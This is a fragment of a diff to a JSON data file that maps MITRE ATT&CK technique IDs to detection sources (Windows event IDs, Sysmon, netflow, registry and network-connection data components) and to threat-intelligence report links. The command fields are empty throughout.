+ "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + 
"http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.group-ib.com/blog/cobalt", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + ] + }, + { + "technique_id": "T1065", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Netflow/Enclave netflow" + ] + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://citizenlab.org/2016/08/group5-syria/", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + 
"https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + { + "technique_id": "T1174", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Sysmon", + "DLL monitoring" + ], + [ + "Autoruns" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "LOG-MD", + "Autoruns" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1111", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "MFA" + ], + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + 
"source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + 
"target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1116", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "B9", + "Binary file metadata" + ], + [ + "LMD - File Hash" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ], + [ + "LOG-MD", + " - File Hash" + ] + ], + "external_reference": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf", + "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", + "https://securelist.com/winnti-more-than-just-a-game/37029/", + "https://securelist.com/operation-daybreak/75100/", + "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ] + }, + { + "technique_id": 
"T1186", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1045", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "LOG-MD - B9", + "Binary file metadata" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ] + ], + "external_reference": [ + "https://securelist.com/the-dropping-elephant-actor/75328/", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://content.fireeye.com/apt/rpt-apt38", + "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://citizenlab.org/2016/08/group5-syria/", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + ] + }, + { + "technique_id": "T1109", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File Monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File Monitoring" + ] + ], + "external_reference": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf" + ] + }, + { + "technique_id": "T1198", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": 
[], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Windows event logs" + ], + [ + "Loaded DLLs" + ], + [ + "DLL monitoring" + ], + [ + "API monitoring" + ], + [ + "Application Logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Windows event logs" + ], + [ + "Sysmon - ID 7", + "Loaded DLLs" + ], + [ + "Sysmon - ID 7", + "DLL monitoring" + ], + [ + "API monitoring" + ], + [ + "Application Logs" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1173", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Windows event logs" + ], + [ + "DLL monitoring" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "Windows Registry" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "Windows event logs" + ], + [ + "API monitoring" + ] + ], + "external_reference": [ + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://www.cyberscoop.com/fin7-dde-morphisec-fileless-malware/", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://securelist.com/operation-daybreak/75100/", + "https://securelist.com/muddywater/88059/" + ] + }, + { + "technique_id": "T1061", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File 
monitoring" + ], + [ + "B9", + "Binary file metadata" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html", NaN + ] + }, + { + "technique_id": "T1204", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "Anti-virus" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "Anti-virus" + ], + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "started", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system 
within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "ran", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "redeployed", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance creation", + "description": "An instance was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "instance" + }, + { + "data_source": "image", + "definition": "Information about a virtual machine image.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "image creation", + "description": "An image was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "image" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + 
"data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container start", + "description": "A container was started.", + "source_data_element": "user", + "relationship": "started", + "target_data_element": "container" + }, + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container creation", + "description": "A container was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "container" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
